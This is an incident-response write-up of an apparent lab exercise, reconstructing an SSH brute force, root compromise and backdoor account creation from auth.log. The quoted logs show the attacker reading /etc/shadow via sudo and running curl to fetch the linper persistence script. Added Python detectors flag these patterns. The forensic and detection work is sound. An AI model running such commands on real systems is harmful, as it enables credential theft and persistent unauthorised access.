Brutus

Description

We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed further actions on the host, which we can reconstruct from auth.log.

Summary

On 2025-03-06 the Confluence server (ip-172-31-35-28) was brute-forced over SSH from IP 65.2.161.68, resulting in multiple successful root and user logins. The attacker created a new local account (cyberjunkie), added it to the sudo group, set its password, and used it to execute privileged commands, including reading /etc/shadow and downloading a persistence tool (linper). Impact: root compromise and persistent access.

Files & Artifacts

  • wtmp is a binary file in Linux-based systems located at /var/log/wtmp that records a history of all user logins, logouts, and system shutdowns or reboots. It is used by system administrators for monitoring user activity, troubleshooting login issues, and analyzing system usage.

  • auth.log is a file in Linux systems that records authentication events, such as user login attempts, successful or failed logins, and administrative actions like using the sudo command.

Event Types Observed

❯ cat auth.log | awk '{print $5}' | cut -d ':' -f1 | cut -d '[' -f1 | sort| uniq -c
      1 chfn
    104 CRON
      3 groupadd
      1 passwd
    257 sshd
      6 sudo
      2 systemd
      8 systemd-logind
      1 useradd
      2 usermod

Indicators of Compromise (IOCs)

Type        Indicator                                                              Description
IP Address  65.2.161.68                                                            External attacker performing brute force
Username    root, cyberjunkie                                                      Compromised and attacker-created accounts
File/Tool   linper.sh                                                              Linux persistence toolkit
URL         https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh  Remote payload source

Chronological Attack Timeline

Brute force activity

The brute force attack from 65.2.161.68 commenced on March 6 at 06:31:31 and produced a total of 82 failed/invalid attempts (the count below includes both "Invalid user" and "Failed password" lines).

❯ cat auth.log | grep sshd | grep -v "pam_unix"  | grep "65.2.161.68" | grep -E "Failed|Invalid"
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: Invalid user admin from 65.2.161.68 port 46392
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: Invalid user admin from 65.2.161.68 port 46444
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: Invalid user admin from 65.2.161.68 port 46436
Mar  6 06:31:31 ip-172-31-35-28 sshd[2330]: Invalid user admin from 65.2.161.68 port 46422
Mar  6 06:31:31 ip-172-31-35-28 sshd[2337]: Invalid user admin from 65.2.161.68 port 46498
Mar  6 06:31:31 ip-172-31-35-28 sshd[2328]: Invalid user admin from 65.2.161.68 port 46390
Mar  6 06:31:31 ip-172-31-35-28 sshd[2335]: Invalid user admin from 65.2.161.68 port 46460
Mar  6 06:31:31 ip-172-31-35-28 sshd[2334]: Invalid user admin from 65.2.161.68 port 46454
Mar  6 06:31:31 ip-172-31-35-28 sshd[2329]: Invalid user admin from 65.2.161.68 port 46414
Mar  6 06:31:31 ip-172-31-35-28 sshd[2333]: Invalid user admin from 65.2.161.68 port 46452
Mar  6 06:31:33 ip-172-31-35-28 sshd[2327]: Failed password for invalid user admin from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2331]: Failed password for invalid user admin from 65.2.161.68 port 46436 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2332]: Failed password for invalid user admin from 65.2.161.68 port 46444 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2335]: Failed password for invalid user admin from 65.2.161.68 port 46460 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2337]: Failed password for invalid user admin from 65.2.161.68 port 46498 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2334]: Failed password for invalid user admin from 65.2.161.68 port 46454 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2338]: Failed password for backup from 65.2.161.68 port 46512 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2336]: Failed password for backup from 65.2.161.68 port 46468 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2330]: Failed password for invalid user admin from 65.2.161.68 port 46422 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2328]: Failed password for invalid user admin from 65.2.161.68 port 46390 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2329]: Failed password for invalid user admin from 65.2.161.68 port 46414 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2333]: Failed password for invalid user admin from 65.2.161.68 port 46452 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2352]: Failed password for backup from 65.2.161.68 port 46568 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2351]: Failed password for backup from 65.2.161.68 port 46538 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2355]: Failed password for backup from 65.2.161.68 port 46576 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2357]: Failed password for backup from 65.2.161.68 port 46582 ssh2
Mar  6 06:31:35 ip-172-31-35-28 sshd[2359]: Invalid user server_adm from 65.2.161.68 port 46596
Mar  6 06:31:35 ip-172-31-35-28 sshd[2361]: Invalid user server_adm from 65.2.161.68 port 46614
Mar  6 06:31:35 ip-172-31-35-28 sshd[2368]: Invalid user server_adm from 65.2.161.68 port 46676
Mar  6 06:31:35 ip-172-31-35-28 sshd[2369]: Invalid user server_adm from 65.2.161.68 port 46682
Mar  6 06:31:35 ip-172-31-35-28 sshd[2366]: Invalid user server_adm from 65.2.161.68 port 46648
Mar  6 06:31:35 ip-172-31-35-28 sshd[2365]: Invalid user server_adm from 65.2.161.68 port 46644
Mar  6 06:31:35 ip-172-31-35-28 sshd[2364]: Invalid user server_adm from 65.2.161.68 port 46632
Mar  6 06:31:35 ip-172-31-35-28 sshd[2367]: Invalid user server_adm from 65.2.161.68 port 46664
Mar  6 06:31:35 ip-172-31-35-28 sshd[2363]: Invalid user server_adm from 65.2.161.68 port 46620
Mar  6 06:31:35 ip-172-31-35-28 sshd[2377]: Invalid user server_adm from 65.2.161.68 port 46684
Mar  6 06:31:36 ip-172-31-35-28 sshd[2379]: Invalid user server_adm from 65.2.161.68 port 46698
Mar  6 06:31:36 ip-172-31-35-28 sshd[2380]: Invalid user server_adm from 65.2.161.68 port 46710
Mar  6 06:31:36 ip-172-31-35-28 sshd[2383]: Invalid user svc_account from 65.2.161.68 port 46722
Mar  6 06:31:36 ip-172-31-35-28 sshd[2384]: Invalid user svc_account from 65.2.161.68 port 46732
Mar  6 06:31:36 ip-172-31-35-28 sshd[2357]: Failed password for backup from 65.2.161.68 port 46582 ssh2
Mar  6 06:31:36 ip-172-31-35-28 sshd[2387]: Invalid user svc_account from 65.2.161.68 port 46742
Mar  6 06:31:36 ip-172-31-35-28 sshd[2389]: Invalid user svc_account from 65.2.161.68 port 46744
Mar  6 06:31:37 ip-172-31-35-28 sshd[2359]: Failed password for invalid user server_adm from 65.2.161.68 port 46596 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2361]: Failed password for invalid user server_adm from 65.2.161.68 port 46614 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2368]: Failed password for invalid user server_adm from 65.2.161.68 port 46676 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2369]: Failed password for invalid user server_adm from 65.2.161.68 port 46682 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2365]: Failed password for invalid user server_adm from 65.2.161.68 port 46644 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2366]: Failed password for invalid user server_adm from 65.2.161.68 port 46648 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2364]: Failed password for invalid user server_adm from 65.2.161.68 port 46632 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2367]: Failed password for invalid user server_adm from 65.2.161.68 port 46664 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2363]: Failed password for invalid user server_adm from 65.2.161.68 port 46620 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2391]: Invalid user svc_account from 65.2.161.68 port 46750
Mar  6 06:31:37 ip-172-31-35-28 sshd[2393]: Invalid user svc_account from 65.2.161.68 port 46774
Mar  6 06:31:37 ip-172-31-35-28 sshd[2377]: Failed password for invalid user server_adm from 65.2.161.68 port 46684 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2394]: Invalid user svc_account from 65.2.161.68 port 46786
Mar  6 06:31:37 ip-172-31-35-28 sshd[2397]: Invalid user svc_account from 65.2.161.68 port 46814
Mar  6 06:31:37 ip-172-31-35-28 sshd[2398]: Invalid user svc_account from 65.2.161.68 port 46840
Mar  6 06:31:37 ip-172-31-35-28 sshd[2396]: Invalid user svc_account from 65.2.161.68 port 46800
Mar  6 06:31:37 ip-172-31-35-28 sshd[2400]: Invalid user svc_account from 65.2.161.68 port 46854
Mar  6 06:31:38 ip-172-31-35-28 sshd[2379]: Failed password for invalid user server_adm from 65.2.161.68 port 46698 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2380]: Failed password for invalid user server_adm from 65.2.161.68 port 46710 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2383]: Failed password for invalid user svc_account from 65.2.161.68 port 46722 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2384]: Failed password for invalid user svc_account from 65.2.161.68 port 46732 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2387]: Failed password for invalid user svc_account from 65.2.161.68 port 46742 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2389]: Failed password for invalid user svc_account from 65.2.161.68 port 46744 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2391]: Failed password for invalid user svc_account from 65.2.161.68 port 46750 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2393]: Failed password for invalid user svc_account from 65.2.161.68 port 46774 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2394]: Failed password for invalid user svc_account from 65.2.161.68 port 46786 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2397]: Failed password for invalid user svc_account from 65.2.161.68 port 46814 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2398]: Failed password for invalid user svc_account from 65.2.161.68 port 46840 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2396]: Failed password for invalid user svc_account from 65.2.161.68 port 46800 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2400]: Failed password for invalid user svc_account from 65.2.161.68 port 46854 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2399]: Failed password for root from 65.2.161.68 port 46852 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2407]: Failed password for root from 65.2.161.68 port 46876 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar  6 06:31:41 ip-172-31-35-28 sshd[2399]: Failed password for root from 65.2.161.68 port 46852 ssh2
Mar  6 06:31:41 ip-172-31-35-28 sshd[2407]: Failed password for root from 65.2.161.68 port 46876 ssh2
Mar  6 06:31:41 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar  6 06:31:42 ip-172-31-35-28 sshd[2423]: Failed password for backup from 65.2.161.68 port 34834 ssh2
Mar  6 06:31:42 ip-172-31-35-28 sshd[2424]: Failed password for backup from 65.2.161.68 port 34856 ssh2
❯ cat auth.log | grep sshd | grep -v "pam_unix"  | grep "65.2.161.68" | grep -E "Failed|Invalid" | wc -l
82

Successful Compromise

At 06:31:40, one of the brute force attempts successfully guessed the root account password, resulting in a complete compromise of the server.

❯ cat auth.log | grep sshd | grep -v "pam_unix"  | grep "65.2.161.68" | grep -E "Accepted"
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2

Between 06:31:40 and 06:32:44, two root authentications were recorded:

  • Session 34 was the successful brute force attempt.

  • Session 37 was a manual root login by the attacker.

❯ cat auth.log  | grep -A 3 "Accepted"
<SNIP>
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Received disconnect from 65.2.161.68 port 46698:11: Bye Bye [preauth]
--
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar  6 06:33:01 ip-172-31-35-28 CRON[2561]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
<SNIP>
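As an added example (not part of the original write-up), the brute-force-then-success pattern traced by hand above, written as detection logic: it counts failed and invalid SSH attempts per source IP, flags any Accepted login from an IP that already had at least a threshold of failures (5 here, an assumed value), and attaches the systemd-logind session number the way the grep -A 3 does by hand. The sample lines are constructed in the format of the page's log; the ubuntu login from 203.0.113.5 is a made-up benign control.

```python
import re

# Constructed sample in the format of the page's auth.log excerpts (not the full log).
SAMPLE_LOG = """\
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar  6 06:31:33 ip-172-31-35-28 sshd[2325]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2338]: Failed password for backup from 65.2.161.68 port 46512 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2359]: Failed password for invalid user server_adm from 65.2.161.68 port 46596 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2399]: Failed password for root from 65.2.161.68 port 46852 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar  6 07:10:02 ip-172-31-35-28 sshd[2700]: Accepted publickey for ubuntu from 203.0.113.5 port 50000 ssh2
Mar  6 07:10:02 ip-172-31-35-28 systemd-logind[411]: New session 50 of user ubuntu.
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (\S+?)\[(\d+)\]: (.*)$")
FAIL_RE = re.compile(r"(?:Failed password for (?:invalid user )?|Invalid user )(\S+) from (\S+) port")
ACCEPT_RE = re.compile(r"Accepted (\S+) for (\S+) from (\S+) port")
SESSION_RE = re.compile(r"New session (\d+) of user (\S+)\.")
def analyze(log_text, threshold=5):
    # Returns (failures per ip, usernames tried per ip, alerts for logins after >= threshold failures).
    failures = {}   # source ip -> failed/invalid attempts seen so far
    usernames = {}  # source ip -> set of usernames tried
    pending = None  # last Accepted login still waiting for its logind session id
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m: continue
        ts, prog, pid, msg = m.groups()
        if prog == "sshd":
            f = FAIL_RE.search(msg)
            if f:
                failures[f.group(2)] = failures.get(f.group(2), 0) + 1
                usernames.setdefault(f.group(2), set()).add(f.group(1))
                continue
            a = ACCEPT_RE.search(msg)
            if a:
                method, user, ip = a.groups()
                pending = {"time": ts, "method": method, "user": user, "ip": ip, "sshd_pid": int(pid),
                           "prior_failures": failures.get(ip, 0), "session": None}
                if pending["prior_failures"] >= threshold:
                    alerts.append(pending)  # password accepted right after a burst of failures
        elif prog == "systemd-logind" and pending is not None:
            s = SESSION_RE.search(msg)  # "New session N of user X." follows the Accepted line
            if s and s.group(2) == pending["user"]:
                pending["session"] = int(s.group(1))
                pending = None
    return failures, {ip: sorted(u) for ip, u in usernames.items()}, alerts
```

Run against the real auth.log, the alerts list reproduces sessions 34 and 37 from 65.2.161.68 while the usernames map shows the wordlist the attacker cycled through (admin, backup, server_adm, svc_account, root).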

Post-Compromise Actions

At 06:34:18 an account was created on the server called cyberjunkie.

Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1

Between 06:34:18 and 06:35:15, the malicious actor created a group named cyberjunkie, created a user with the same name, set its password, updated its account information (chfn), and added it to the sudo group, granting administrative privileges to ensure persistence on the server.

Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar  6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'

Bad Actor logged out

At 06:37:24, the root user logged out of Session 37.

❯ cat auth.log | grep "Session 37 logged out"
Mar  6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.

At 06:37:34, the malicious actor logged into the system using the cyberjunkie account.

Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar  6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.

Finally, the cyberjunkie account used sudo to read /etc/shadow, confirming that it now had root-level privileges, and then downloaded linper, a Linux persistence toolkit, to maintain access to the system.

Tool: https://github.com/montysecurity/linper

Mar  6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
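An added example, not from the original write-up: the post-compromise sequence above (useradd, usermod into sudo, privileged sudo commands) turned into a small timeline function that a responder could run over auth.log. It flags new local accounts that are added to an admin group and then use sudo for credential access or remote downloads; the admin-group names and sensitive command substrings are assumptions, and the sample lines are constructed in the format of the page's log (the ubuntu apt line is a benign control).

```python
import re

# Constructed sample in the format of the page's auth.log excerpts (not the full log).
SAMPLE = """\
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Mar  6 08:00:01 ip-172-31-35-28 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/apt update
"""

# The program field may or may not carry a [pid] (sudo and systemd lines do not).
LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (\S+?)(?:\[\d+\])?: (.*)$")
SUDO_RE = re.compile(r"^\s*(\S+) : .*?USER=(\S+) ; COMMAND=(.*)$")
ADMIN_GROUPS = {"sudo", "wheel", "admin"}  # assumed list of privilege-granting groups
# Assumed substrings in a sudo COMMAND that deserve review when run by a newly created account.
SENSITIVE = ("/etc/shadow", "/etc/sudoers", "curl ", "wget ")

def account_timeline(log_text):
    """Return (timestamp, kind, account, detail) findings for new local accounts that
    gain an admin group and then use sudo for credential access or remote downloads."""
    created = {}   # account name -> creation timestamp
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, prog, msg = m.groups()
        if prog == "useradd":
            u = re.search(r"new user: name=([^,]+)", msg)
            if u:
                created[u.group(1)] = ts
                findings.append((ts, "account_created", u.group(1), msg))
        elif prog == "usermod":
            g = re.search(r"add '([^']+)' to group '([^']+)'", msg)
            if g and g.group(2) in ADMIN_GROUPS:
                findings.append((ts, "admin_group_added", g.group(1), g.group(2)))
        elif prog == "sudo":
            s = SUDO_RE.match(msg)
            if s and s.group(1) in created and any(t in s.group(3) for t in SENSITIVE):
                findings.append((ts, "sensitive_sudo_by_new_account", s.group(1), s.group(3)))
    return findings
```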

Recommendations

  • Disable root SSH login (PermitRootLogin no)

  • Enforce key-based authentication

  • Enable fail2ban or equivalent SSH brute-force protection

  • Audit /etc/sudoers for unauthorized users

  • Rotate all credentials and remove cyberjunkie account

  • Review /etc/rc.local and crontabs for persistence traces
